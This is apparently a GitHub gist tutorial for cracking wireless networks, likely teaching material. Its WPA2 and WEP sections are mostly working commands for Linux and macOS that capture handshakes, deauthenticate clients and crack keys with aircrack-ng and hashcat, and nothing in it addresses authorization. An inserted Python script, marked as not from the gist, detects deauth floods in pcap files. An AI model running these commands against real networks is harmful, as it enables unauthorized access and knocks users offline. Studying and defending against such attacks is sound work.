@0xacb 0xacb/tpas-wireless-cracking.md Secret
Last active Nov 23, 2018

TPAS Tutorial

TPAS - Wireless Cracking Tutorial

Install the aircrack-ng suite, Wireshark and hashcat

Linux: apt install aircrack-ng wireshark hashcat

OSX: brew install aircrack-ng wireshark hashcat

hashcat-utils: https://github.com/hashcat/hashcat-utils

WPA2 Cracking

Linux

  • Get a wordlist (e.g. https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt)
  • Put the interface in monitor mode: airmon-ng start wlan0
  • Get the BSSID and channel of the target network with airodump-ng mon0
  • Use the following command to capture a 4-way handshake (change the channel and BSSID): airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w capture.cap mon0
  • While waiting for the handshake, aireplay can be used to force clients to reconnect to the AP (deauth) with the command: aireplay-ng -0 2 -a xx:xx:xx:xx:xx:xx mon0
  • Wait for the WPA handshake
  • cap2hccapx capture.cap capture.hccapx
  • hashcat -m 2500 capture.hccapx wordlist.txt

OSX

ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

export BSSID=xx:xx:xx:xx:xx:xx
export CHANNEL=1
sudo airport -z
sudo airport -c$CHANNEL
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 6 -i en0 -w beacon.cap
echo "Waiting for handshake... CTRL-C when frames > 4"
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
echo "Done"
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
cap2hccapx capture.cap capture.hccapx
  • While waiting for the handshake, clients can be forced to reconnect to the AP (deauth) with the tool https://github.com/unixpickle/JamWiFi
  • hashcat -m 2500 capture.hccapx wordlist.txt
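As an added example (not part of the gist), the Python script below parses a pcap of raw 802.11 frames and reports, per BSSID, the beacon, deauthentication and EAPOL frames the capture steps above depend on, flagging a deauthentication burst of the kind aireplay-ng -0 generates, which is the signal a wireless IDS alerts on. It assumes link type 105 (no radiotap header) and a hypothetical threshold of 10 deauth frames; a capture from tcpdump -I typically carries radiotap headers, which this parser rejects rather than skips.

```python
import struct
from collections import defaultdict

# Constructed example, not the gist's code: per-BSSID counts of beacon, deauth and
# EAPOL (0x888e) frames in a pcap of raw 802.11 frames (link type 105, no radiotap).
DEAUTH_THRESHOLD = 10  # hypothetical flood threshold; tune for your environment
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"


def analyse_pcap(data):
    """Return {bssid: {beacon, deauth, eapol, deauth_flood}} for pcap bytes."""
    endian = "<" if data[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    if struct.unpack(endian + "I", data[20:24])[0] != 105:
        raise ValueError("expected raw 802.11 frames (link type 105)")
    stats, off = defaultdict(lambda: {"beacon": 0, "deauth": 0, "eapol": 0}), 24
    while off + 16 <= len(data):
        incl = struct.unpack(endian + "I", data[off + 8:off + 12])[0]
        frame, off = data[off + 16:off + 16 + incl], off + 16 + incl
        if len(frame) < 24 or (frame[1] & 0x03) == 0x03:  # too short or 4-address WDS frame
            continue
        fc0, fc1 = frame[0], frame[1]
        ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
        # To DS set -> BSSID is addr1; From DS set -> addr2; neither -> addr3
        bssid = frame[4:10] if fc1 & 0x01 else frame[10:16] if fc1 & 0x02 else frame[16:22]
        s = stats[bssid.hex(":")]
        if ftype == 0 and subtype == 8:
            s["beacon"] += 1
        elif ftype == 0 and subtype == 12:
            s["deauth"] += 1
        elif ftype == 2 and not (fc1 & 0x40):  # unprotected data frame
            hdr = 24 + (2 if subtype & 0x8 else 0)  # QoS data adds a 2-byte QoS control field
            if frame[hdr:hdr + 8] == LLC_SNAP_EAPOL:
                s["eapol"] += 1
    for s in stats.values():
        s["deauth_flood"] = s["deauth"] >= DEAUTH_THRESHOLD
    return dict(stats)


def build_sample_pcap():
    """Constructed capture: one beacon, 12 broadcast deauths and a 4-message EAPOL handshake."""
    ap, sta, bcast = bytes.fromhex("0011223344aa"), bytes.fromhex("00aabbccdd01"), b"\xff" * 6
    hdr = lambda fc0, fc1, a1, a2, a3: bytes([fc0, fc1, 0, 0]) + a1 + a2 + a3 + b"\x00\x00"
    eapol = LLC_SNAP_EAPOL + b"\x02\x03\x00\x5f\x02" + b"\x00" * 94  # EAPOL-Key, RSN descriptor
    frames = [hdr(0x80, 0x00, bcast, ap, ap) + b"\x00" * 12]       # beacon (fixed fields only)
    frames += [hdr(0xC0, 0x00, bcast, ap, ap) + b"\x07\x00"] * 12  # deauths, reason code 7
    frames += [hdr(0x08, 0x02, sta, ap, ap) + eapol, hdr(0x08, 0x01, ap, sta, ap) + eapol] * 2
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)  # little-endian pcap header
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out
```

Running analyse_pcap(open("capture.cap", "rb").read()) on a real capture reports the same per-BSSID dictionary, with deauth_flood set when the burst exceeds the threshold.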

WEP Cracking

  • Put the interface in monitor mode
  • Use airodump-ng or Wireshark to capture packets
  • Use aircrack-ng to crack the key: aircrack-ng -1 -a 1 -b xx:xx:xx:xx:xx:xx capture.pcap